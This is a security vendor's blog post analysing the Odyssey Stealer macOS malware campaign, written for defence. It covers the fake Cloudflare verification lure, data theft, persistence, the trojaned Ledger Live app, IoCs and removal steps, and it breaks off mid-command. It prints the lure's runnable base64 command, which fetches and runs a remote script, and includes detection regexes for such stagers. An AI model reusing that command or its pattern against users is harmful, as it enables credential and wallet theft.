{"id":31095,"date":"2025-06-11T03:13:58","date_gmt":"2025-06-11T03:13:58","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=31095"},"modified":"2025-06-14T01:50:57","modified_gmt":"2025-06-14T01:50:57","slug":"odyssey-stealer-macos-malware","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/odyssey-stealer-macos-malware\/","title":{"rendered":"Odyssey Stealer: Russian &#8216;Love Trump&#8217; Malware Replaces Ledger Live Crypto Wallet App"},"content":{"rendered":"<p>A new macOS malware campaign is targeting users through social engineering, masquerading as a legitimate Cloudflare security check. The <strong>Odyssey Stealer<\/strong> represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities.<\/p>\r\n\r\n<p>Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like <code>com.love.russia.plist<\/code> and staging directories named <code>lovemrtrump<\/code> &#8211; suggesting potential connections to Russian threat actors with apparent political motivations, although strings like these cost nothing to plant and are weak attribution evidence on their own. Most concerning is the malware&#8217;s ability to replace the legitimate <a href=\"https:\/\/www.ledger.com\/ledger-live\" target=\"_blank\" rel=\"nofollow noopener\">Ledger Live<\/a> companion app with a trojaned build. A Ledger device never exports its private keys, so the trojan cannot read them off the hardware; what a malicious companion app can do is phish the 24-word recovery phrase through a fake setup or verification prompt and tamper with the transactions it relays to the device, and either is enough to drain the wallet.<\/p>\r\n\r\n<h2>The Deception Chain: From Fake Verification to Full Compromise<\/h2>\r\n\r\n<p>The attack begins when users are redirected to seemingly legitimate domains like <code>macosx-apps[.]com<\/code> (macosxappstore[.]com, <a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/url\/appmacosx-com\">appmacosx[.]com<\/a>) displaying convincing Cloudflare-styled verification pages, the copy-this-into-Terminal lure generally known as ClickFix. 
These pages present users with an &#8220;Unusual Web Traffic Detected&#8221; warning and request manual verification through terminal commands.<\/p>\r\n<figure id=\"attachment_31097\" aria-describedby=\"caption-attachment-31097\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-1024x767.png\" alt=\"macosx-apps - Fake Cloudflare verification page\" width=\"1024\" height=\"767\" class=\"size-large wp-image-31097\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-1024x767.png 1024w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-300x225.png 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-768x575.png 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-1536x1150.png 1536w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-2048x1534.png 2048w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-860x644.png 860w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-31097\" class=\"wp-caption-text\">macosx-apps &#8211; Fake Cloudflare verification page<\/figcaption><\/figure>\r\n<p>The fake verification page instructs users to:<\/p>\r\n<ol>\r\n    <li>Press <kbd>Command + Space<\/kbd> to open Spotlight<\/li>\r\n    <li>Type &#8220;Terminal&#8221; and press Return<\/li>\r\n    <li>Copy and paste a provided command<\/li>\r\n    <li>Execute the command to &#8220;verify&#8221; their legitimacy<\/li>\r\n<\/ol>\r\n\r\n<p>What the page presents as a harmless verification string is a base64-wrapped command that decodes itself and hands the result to <code>bash<\/code>: <code>echo \"Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==\" | base64 -d | bash<\/code><\/p>\r\n\r\n<p>When decoded, this reveals the true payload: <code>curl -s 
hxxp[:]\/\/odyssey1[.]to:3333\/d?u=october | nohup bash &<\/code> &#8211; the server returns a script that is piped straight into <code>bash<\/code>, and the trailing <code>nohup &hellip; &amp;<\/code> detaches it from the Terminal session so that closing the window does not stop it. That script stages and runs the AppleScript stealer described below.<\/p>\r\n\r\n\r\n<div class=\"odyssey-attack-flow\">\r\n    <svg width=\"100%\" height=\"450\" viewBox=\"0 0 800 450\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n        <defs>\r\n            <marker id=\"arrowhead\" markerWidth=\"10\" markerHeight=\"7\" refX=\"9\" refY=\"3.5\" orient=\"auto\">\r\n                <polygon points=\"0 0, 10 3.5, 0 7\" fill=\"#333\" \/>\r\n            <\/marker>\r\n        <\/defs>\r\n        \r\n        <!-- Background -->\r\n        <rect width=\"800\" height=\"450\" fill=\"#f8f9fa\" stroke=\"#ddd\" stroke-width=\"1\"\/>\r\n        \r\n        <!-- Title -->\r\n        <text x=\"400\" y=\"25\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" fill=\"#333\">Odyssey Stealer Attack Flow<\/text>\r\n        \r\n        <!-- Step 1: Initial Redirect -->\r\n        <rect x=\"50\" y=\"60\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#ffebee\" stroke=\"#e57373\" stroke-width=\"2\"\/>\r\n        <text x=\"125\" y=\"80\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">User Redirected<\/text>\r\n        <text x=\"125\" y=\"95\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">to macosx-apps.com, macosxappstore.com, appmacosx.com<\/text>\r\n        <text x=\"125\" y=\"110\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">fake Cloudflare page<\/text>\r\n        \r\n        <!-- Arrow 1 -->\r\n        <line x1=\"200\" y1=\"90\" x2=\"250\" y2=\"90\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 2: Fake Verification -->\r\n        <rect x=\"270\" y=\"60\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#fff3e0\" stroke=\"#ffb74d\" 
stroke-width=\"2\"\/>\r\n        <text x=\"345\" y=\"80\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Fake Verification<\/text>\r\n        <text x=\"345\" y=\"95\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">&#8220;Unusual Traffic&#8221;<\/text>\r\n        <text x=\"345\" y=\"110\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Terminal Instructions<\/text>\r\n        \r\n        <!-- Arrow 2 -->\r\n        <line x1=\"420\" y1=\"90\" x2=\"470\" y2=\"90\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 3: Base64 Command -->\r\n        <rect x=\"490\" y=\"60\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#e8f5e8\" stroke=\"#81c784\" stroke-width=\"2\"\/>\r\n        <text x=\"565\" y=\"80\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Base64 Command<\/text>\r\n        <text x=\"565\" y=\"95\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">User copies and<\/text>\r\n        <text x=\"565\" y=\"110\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">executes in Terminal<\/text>\r\n        \r\n        <!-- Arrow 3 (down) -->\r\n        <line x1=\"565\" y1=\"120\" x2=\"565\" y2=\"170\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 4: Download Script -->\r\n        <rect x=\"490\" y=\"180\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#e3f2fd\" stroke=\"#64b5f6\" stroke-width=\"2\"\/>\r\n        <text x=\"565\" y=\"200\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Script Download<\/text>\r\n                 <text x=\"565\" y=\"215\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" 
fill=\"#666\">from odyssey1[.]to:3333<\/text>\r\n        <text x=\"565\" y=\"230\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">AppleScript Payload<\/text>\r\n        \r\n        <!-- Arrow 4 (left) -->\r\n        <line x1=\"490\" y1=\"210\" x2=\"420\" y2=\"210\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 5: Data Collection -->\r\n        <rect x=\"270\" y=\"180\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#f3e5f5\" stroke=\"#ba68c8\" stroke-width=\"2\"\/>\r\n        <text x=\"345\" y=\"200\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Data Collection<\/text>\r\n        <text x=\"345\" y=\"215\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Browser credentials,<\/text>\r\n        <text x=\"345\" y=\"230\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">wallets, system info<\/text>\r\n        \r\n        <!-- Arrow 5 (left) -->\r\n        <line x1=\"270\" y1=\"210\" x2=\"200\" y2=\"210\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 6: Exfiltration -->\r\n        <rect x=\"50\" y=\"180\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#ffebee\" stroke=\"#e57373\" stroke-width=\"2\"\/>\r\n        <text x=\"125\" y=\"200\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Data Exfiltration<\/text>\r\n        <text x=\"125\" y=\"215\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">ZIP upload to<\/text>\r\n                 <text x=\"125\" y=\"230\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">odyssey1[.]to server<\/text>\r\n        \r\n        <!-- Arrow 6 (down) -->\r\n        <line x1=\"125\" y1=\"240\" x2=\"125\" y2=\"290\" 
stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 7: Persistence -->\r\n        <rect x=\"50\" y=\"300\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#fce4ec\" stroke=\"#f06292\" stroke-width=\"2\"\/>\r\n        <text x=\"125\" y=\"320\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Persistence Setup<\/text>\r\n        <text x=\"125\" y=\"335\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">LaunchDaemon<\/text>\r\n        <text x=\"125\" y=\"350\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">com.love.russia.plist<\/text>\r\n        \r\n        <!-- Arrow 7 (right) -->\r\n        <line x1=\"200\" y1=\"330\" x2=\"270\" y2=\"330\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 8: App Replacement -->\r\n        <rect x=\"290\" y=\"300\" width=\"160\" height=\"60\" rx=\"8\" fill=\"#fff3e0\" stroke=\"#ffb74d\" stroke-width=\"2\"\/>\r\n        <text x=\"370\" y=\"320\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">App Replacement<\/text>\r\n        <text x=\"370\" y=\"335\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Malicious Ledger Live<\/text>\r\n        <text x=\"370\" y=\"350\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">installation<\/text>\r\n        \r\n        <!-- Arrow 8 (right) -->\r\n        <line x1=\"450\" y1=\"330\" x2=\"520\" y2=\"330\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 9: Ongoing Control -->\r\n        <rect x=\"540\" y=\"300\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#e8f5e8\" stroke=\"#81c784\" stroke-width=\"2\"\/>\r\n        <text x=\"615\" y=\"320\" text-anchor=\"middle\" 
font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Ongoing Control<\/text>\r\n        <text x=\"615\" y=\"335\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Botnet binary<\/text>\r\n        <text x=\"615\" y=\"350\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">execution loop<\/text>\r\n        \r\n        <!-- Risk indicators -->\r\n        <text x=\"50\" y=\"390\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#d32f2f\">High Risk:<\/text>\r\n        <text x=\"120\" y=\"390\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Complete system compromise, credential theft, crypto wallet access<\/text>\r\n        \r\n        <text x=\"50\" y=\"410\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#f57c00\">Persistence:<\/text>\r\n        <text x=\"125\" y=\"410\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Survives reboots, runs continuously, replaces legitimate applications<\/text>\r\n        \r\n        <text x=\"50\" y=\"430\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#388e3c\">Detection:<\/text>\r\n                 <text x=\"110\" y=\"430\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Monitor \/tmp\/lovemrtrump\/, network connections to odyssey1[.]to, LaunchDaemon processes<\/text>\r\n    <\/svg>\r\n<\/div>\r\n\r\n\r\n<h2>Advanced AppleScript Capabilities: Beyond Basic Info-Stealing<\/h2>\r\n\r\n<p>The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. 
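<p>The base64-wrapped &#8220;verification&#8221; command from the deception chain above is worth being able to triage mechanically, because the same lure is reused with different payload strings. The Python script below is an added example written for this article, not code from the original analysis or from the malware: it decodes every base64 run it finds in a pasted command, flags download-and-execute and detach-from-terminal patterns, and defangs any URL for reporting. It never executes anything. The first sample is the exact command from the fake page; the second, benign sample and the heuristics themselves are constructed for the example.<\/p>

```python
"""Triage a pasted 'verification' command of the kind the fake Cloudflare page hands out.

Added example, not code from the original write-up or from the malware. Nothing here is
executed: base64 runs are decoded, stager patterns are flagged, and URLs are defanged so
the result can go straight into a ticket.
"""
import base64
import binascii
import re

# A base64 run long enough to carry a command; shorter runs are usually option values or noise.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Downloader piped into an interpreter: curl/wget ... | [nohup] bash/sh/zsh/osascript
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(?:nohup\s+)?(bash|sh|zsh|osascript)\b")
# A base64 layer decoded straight into a shell: ... | base64 -d | bash
B64_TO_SHELL_RE = re.compile(r"\|\s*base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:nohup\s+)?(bash|sh|zsh)\b")
# Detached from the terminal so closing the window does not stop it.
NOHUP_RE = re.compile(r"\bnohup\b.*&\s*$")
URL_RE = re.compile(r"https?://[^\s'\"|&;]+")


def decode_blobs(command: str) -> list[str]:
    """Decode every well-formed base64 run in `command` that yields printable text (one level deep)."""
    decoded = []
    for match in B64_RUN_RE.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            decoded.append(text)
    return decoded


def defang(url: str) -> str:
    """hxxp://host[.]tld form, so an IoC pasted into a report is not clickable."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(command: str) -> dict:
    """Classify a pasted command; the verdict is 'malicious' when any stager pattern is present."""
    layers = [command] + decode_blobs(command)  # outer command plus whatever it hides
    reasons, urls = set(), []
    for layer in layers:
        if PIPE_TO_SHELL_RE.search(layer):
            reasons.add("downloader piped into a shell")
        if B64_TO_SHELL_RE.search(layer):
            reasons.add("base64 layer decoded straight into a shell")
        if NOHUP_RE.search(layer):
            reasons.add("detached from the terminal with nohup ... &")
        urls.extend(defang(u) for u in URL_RE.findall(layer))
    return {
        "decoded": layers[1:],
        "urls": urls,
        "reasons": sorted(reasons),
        "verdict": "malicious" if reasons else "benign",
    }


# The command the fake verification page hands out (taken from the analysis above), and a
# constructed benign command that also uses base64, to show the heuristics do not fire on it.
ODYSSEY_COMMAND = (
    'echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg=="'
    " | base64 -d | bash"
)
BENIGN_COMMAND = 'echo "aGVsbG8gd29ybGQgZnJvbSBiYXNlNjQ=" | base64 -d'  # "hello world from base64"

if __name__ == "__main__":
    for cmd in (ODYSSEY_COMMAND, BENIGN_COMMAND):
        result = triage(cmd)
        print(result["verdict"], result["urls"], result["reasons"])
```

<p>The same three checks map directly onto detection content: a Terminal or shell process whose command line matches <code>base64 -d | bash<\/code> or <code>curl &hellip; | bash<\/code>, especially with a <code>nohup<\/code> detach, is the ClickFix pattern regardless of which domain the lure uses.<\/p>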
The malware employs randomized function names (like <code>f7220708984353234618<\/code> and <code>v4763105019481279311<\/code>) to frustrate signature-based detection while systematically harvesting sensitive information.<\/p>\r\n\r\n<h3>Targeted Data Collection<\/h3>\r\n\r\n<p>The stealer focuses on high-value targets across multiple categories:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Browser Credentials:<\/strong> Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords<\/li>\r\n    <li><strong>Cryptocurrency Wallets:<\/strong> Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications<\/li>\r\n    <li><strong>System Information:<\/strong> Collects detailed hardware and software profiles using <code>system_profiler<\/code><\/li>\r\n    <li><strong>Personal Files:<\/strong> Copies documents from the Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key<\/li>\r\n    <li><strong>Keychain Access:<\/strong> Steals the macOS Keychain database files containing stored passwords and certificates; the login keychain is encrypted with the account password, which is why the fake password prompt described below matters<\/li>\r\n    <li><strong>Apple Notes:<\/strong> Extracts and formats Notes data, potentially revealing personal information and security details<\/li>\r\n<\/ul>\r\n\r\n<h3>Persistence and Privilege Escalation<\/h3>\r\n\r\n<p>The malware establishes multiple persistence mechanisms to maintain long-term access:<\/p>\r\n\r\n<ul>\r\n    <li><strong>LaunchDaemon Installation:<\/strong> Creates <code>\/Library\/LaunchDaemons\/com.love.russia.plist<\/code> so that launchd starts the payload at boot, before any user logs in and typically as root; writing to that directory needs administrator rights, which is what the password prompt provides<\/li>\r\n    <li><strong>Botnet Binary:<\/strong> Downloads and installs a secondary payload (<code>~\/.init<\/code>) that runs continuously<\/li>\r\n    <li><strong>Social Engineering for Sudo:<\/strong> Prompts users with fake &#8220;Application Helper&#8221; dialogs to obtain the account password, which serves both for <code>sudo<\/code> and for unlocking the stolen keychain<\/li>\r\n    <li><strong>Application Replacement:<\/strong> Can replace 
legitimate applications like Ledger Live with <a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/id\/d7023540fd0e682eee3ba63a0b2828cdca60ad9da4ea56a8e41f593c790b0dfb\">malicious versions<\/a><\/li>\r\n<\/ul>\r\n\r\n<h2>Technical Analysis: Obfuscation and Anti-Detection<\/h2>\r\n\r\n<p>The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical <a href=\"https:\/\/gridinsoft.com\/blogs\/lumma-stealer-spreads-via-fake-browser-updates\/\">commodity info-stealers like Lumma<\/a>. The stealer stage ships as AppleScript run by the system&#8217;s own script runtime rather than as a compiled binary (only the secondary <code>~\/.init<\/code> botnet payload is a native executable), so there is no bespoke Mach-O for a scanner to recognise, and the harvesting is done through ordinary scripted calls to system tools such as <code>system_profiler<\/code> and plain file copies, which looks much like routine administration.<\/p>\r\n\r\n<h3>Key Technical Features<\/h3>\r\n\r\n<table style=\"width: 100%; border-collapse: collapse; margin: 20px 0;\">\r\n    <thead>\r\n        <tr style=\"background-color: #f5f5f5;\">\r\n            <th style=\"border: 1px solid #ddd; padding: 12px; text-align: left; color:black;\">Component<\/th>\r\n            <th style=\"border: 1px solid #ddd; padding: 12px; text-align: left; color:black;\">Function<\/th>\r\n            <th style=\"border: 1px solid #ddd; padding: 12px; text-align: left; color:black;\">Impact<\/th>\r\n        <\/tr>\r\n    <\/thead>\r\n    <tbody>\r\n        <tr>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Variable Obfuscation<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Random 19-digit function\/variable names<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Defeats string-based signatures on the identifiers; the behaviour (system_profiler calls, file copies, ZIP upload) is unchanged and still detectable<\/td>\r\n        <\/tr>\r\n        <tr style=\"background-color: #f9f9f9;\">\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Error Handling<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Comprehensive <code>try \/ on error<\/code> blocks<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Prevents crashes and error dialogs that would alert the user<\/td>\r\n     
   <\/tr>\r\n        <tr>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>File Exclusions<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Skips .DS_Store, Cache, temp files<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Keeps the archive small and the upload quick<\/td>\r\n        <\/tr>\r\n        <tr style=\"background-color: #f9f9f9;\">\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Cleanup Routines<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Removes temporary files post-exfiltration<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Removes the staging tree and archive; the LaunchDaemon and the dotfiles in the home folder remain, so the file-system IoCs below still apply<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Retry Mechanism<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">10 upload attempts with 60s delays<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Rides out transient network failures; up to ten minutes of repeated connections to port 3333 is itself a detection opportunity<\/td>\r\n        <\/tr>\r\n    <\/tbody>\r\n<\/table>\r\n\r\n<h2>Cryptocurrency Focus: The Primary Target<\/h2>\r\n\r\n<p>Like many modern stealers, Odyssey specifically targets cryptocurrency assets with <a href=\"https:\/\/gridinsoft.com\/blogs\/meta-infostealer-malware\/\">precision similar to Meta Infostealer campaigns<\/a>. 
The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.<\/p>\r\n\r\n<p>High-priority targets include:<\/p>\r\n<ul>\r\n    <li><strong>MetaMask:<\/strong> The most common Ethereum wallet extension<\/li>\r\n    <li><strong>BNB Chain Wallet:<\/strong> Binance Smart Chain access<\/li>\r\n    <li><strong>Hardware Wallet Interfaces:<\/strong> Ledger Live, Trezor Suite<\/li>\r\n    <li><strong>Desktop Wallets:<\/strong> Electrum, Exodus, Atomic Wallet<\/li>\r\n    <li><strong>Other Wallet Apps:<\/strong> Binance desktop, TonKeeper<\/li>\r\n<\/ul>\r\n\r\n<p>The malware&#8217;s <strong>application replacement capability<\/strong> is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, putting the attacker in control of the software through which the user talks to the hardware wallet.<\/p>\r\n\r\n<h3>The Ledger Live Trojan: Hardware Wallet Compromise<\/h3>\r\n\r\n<p>One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This is not a compromise of Ledger&#8217;s own distribution channel but a local swap on an already-infected Mac, and it works by:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Application Termination:<\/strong> Killing any running Ledger Live processes<\/li>\r\n    <li><strong>File Replacement:<\/strong> Removing the legitimate <code>\/Applications\/Ledger Live.app<\/code><\/li>\r\n    <li><strong>Malicious Installation:<\/strong> Downloading and installing a trojaned version from <code>hxxp[:]\/\/odyssey1[.]to\/otherassets\/ledger.zip<\/code><\/li>\r\n    <li><strong>Seamless Operation:<\/strong> The fake application is built to look identical to the real one, so anything the user types into it (including a recovery phrase entered into a fake restore or verification prompt) and any transaction it relays to the device is under the attacker&#8217;s control<\/li>\r\n<\/ul>\r\n\r\n<p>This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. 
However, the companion software is the part of the system an attacker can reach. A Ledger&#8217;s private keys are generated and kept inside the device and are never handed to the host, so a trojaned Ledger Live cannot simply read them out; the realistic attacks are to phish the 24-word recovery phrase with a convincing setup, restore or firmware-update prompt, or to manipulate the transaction the user is asked to approve. The defence is to treat any on-screen request for the recovery phrase as fraud (Ledger Live never needs it) and to check the destination address and amount on the device&#8217;s own screen before confirming.<\/p>\r\n\r\n<h2>Indicators of Compromise (IoCs)<\/h2>\r\n\r\n<h3>Network Indicators<\/h3>\r\n<ul>\r\n    <li><strong>C2 Server:<\/strong> <code>odyssey1[.]to:3333<\/code><\/li>\r\n    <li><strong>Download URL:<\/strong> <code>hxxp[:]\/\/odyssey1[.]to:3333\/d?u=october<\/code><\/li>\r\n    <li><strong>Fake Domains:<\/strong> <code>macosx-apps[.]com<\/code>, <code>macosxappstore[.]com<\/code>, <code>appmacosx[.]com<\/code><\/li>\r\n    <li><strong>Asset Download:<\/strong> <code>hxxp[:]\/\/odyssey1[.]to\/otherassets\/ledger.zip<\/code><\/li>\r\n    <li><strong>Botnet Binary:<\/strong> <code>hxxp[:]\/\/odyssey1[.]to\/otherassets\/botnet<\/code><\/li>\r\n<\/ul>\r\n\r\n<h3>File System Artifacts<\/h3>\r\n<ul>\r\n    <li><strong>Staging Directory:<\/strong> <code>\/tmp\/lovemrtrump\/<\/code> (on macOS <code>\/tmp<\/code> is a symlink to <code>\/private\/tmp<\/code>, so tools that resolve paths will report <code>\/private\/tmp\/lovemrtrump\/<\/code>)<\/li>\r\n    <li><strong>Exfiltration Archive:<\/strong> <code>\/tmp\/out.zip<\/code><\/li>\r\n    <li><strong>Persistence:<\/strong> <code>\/Library\/LaunchDaemons\/com.love.russia.plist<\/code><\/li>\r\n    <li><strong>User Files:<\/strong> <code>~\/.username<\/code>, <code>~\/.pwd<\/code>, <code>~\/.init<\/code>, <code>~\/.start<\/code><\/li>\r\n    <li><strong>Data Collection:<\/strong> <code>\/tmp\/lovemrtrump\/finder\/<\/code>, <code>\/tmp\/lovemrtrump\/deskwallets\/<\/code><\/li>\r\n<\/ul>\r\n\r\n<h2>Detection and Removal Guide<\/h2>\r\n\r\n<p>If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.<\/p>\r\n\r\n<h3>Immediate Detection Steps<\/h3>\r\n\r\n<ol>\r\n    <li><strong>Check for Active Processes:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" 
title=\"\">\r\n        ps aux | grep -E &quot;(odyssey|lovemrtrump|\\.init)&quot;\r\n        # LaunchDaemons live in the system domain, so list them as root\r\n        sudo launchctl list | grep &quot;com.love.russia&quot;\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Inspect File System:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        ls -la \/tmp\/lovemrtrump\/\r\n        ls -la \/Library\/LaunchDaemons\/com.love.russia.plist\r\n        ls -la ~\/.init ~\/.start ~\/.username ~\/.pwd\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Check Network Connections:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        # netstat -n and lsof -n print numeric addresses, so grepping for the hostname never matches: resolve it first\r\n        dig +short odyssey1.to\r\n        sudo lsof -nP -iTCP -sTCP:ESTABLISHED | grep -E &quot;:3333|RESOLVED_IP&quot;\r\n        <\/pre>\r\n    <\/li>\r\n<\/ol>\r\n\r\n<h3>Manual Removal Process<\/h3>\r\n\r\n<p><strong>Warning:<\/strong> Manual removal requires administrative privileges and careful execution. Copy the staging directory and the dotfiles somewhere safe before deleting them: they show what was collected, and whether the fake password prompt succeeded (the <code>~\/.pwd<\/code> name suggests that is where the answer is kept). For comprehensive cleanup, we recommend using professional security tools.<\/p>\r\n\r\n<ol>\r\n    <li><strong>Stop Malicious Processes:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        # bootout is the current form; unload still works on older releases\r\n        sudo launchctl bootout system\/com.love.russia || sudo launchctl unload 